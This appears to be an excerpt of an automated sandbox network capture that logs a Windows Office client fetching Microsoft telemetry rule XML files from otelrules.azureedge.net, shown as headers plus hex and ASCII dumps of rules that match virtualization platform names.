                                                                                                                                                                                                            2024-11-22 03:27:20 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            67192.168.2.44989613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:21 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:21 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:21 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                            x-ms-request-id: 90758f84-b01e-0021-4c46-3ccab7000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032721Z-178bfbc474bxkclvhC1NYC69g400000002b0000000009p4x
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:21 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            68192.168.2.44989713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:21 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:21 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                            x-ms-request-id: 449238ea-501e-0029-7d7c-3bd0b8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032721Z-174c587ffdftv9hphC1TEBm29w00000000rg00000000fmzg
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:22 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            69192.168.2.44990013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:21 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:22 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                            x-ms-request-id: 6b17e566-f01e-003f-7a44-3cd19d000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032722Z-15b8b599d88cn5thhC1TEBqxkn00000000u0000000004u0x
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:22 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            70192.168.2.44989813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:21 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:22 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                            x-ms-request-id: 1e280d2f-401e-0029-0d7f-3b9b43000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032722Z-174c587ffdfldtt2hC1TEBwv9c00000000qg00000000a48a
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:22 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            71192.168.2.44989913.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:21 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:22 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                            x-ms-request-id: 5304f1e1-001e-005a-6c6b-3bc3d0000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032722Z-178bfbc474bw8bwphC1NYC38b400000002ag000000001q3n
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:22 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            72192.168.2.44990113.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:23 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:23 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 485
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                            x-ms-request-id: 9ca94d1e-301e-0000-0f9c-3beecc000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032723Z-174c587ffdfgcs66hC1TEB69cs00000000m000000000rf18
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:23 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            73192.168.2.44990313.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:23 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:24 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 470
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                            x-ms-request-id: db5fa324-001e-00ad-2244-3c554b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032724Z-15b8b599d88vp97chC1TEB5pzw00000000s000000000hsgz
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:24 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            74192.168.2.44990213.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:24 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:24 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:24 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 411
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                            x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032724Z-178bfbc474btvfdfhC1NYCa2en00000002gg000000006cqp
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:24 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            75192.168.2.44990513.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:24 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:24 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 502
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                            x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032724Z-174c587ffdfb74xqhC1TEBhabc00000000w000000000annr
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:24 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
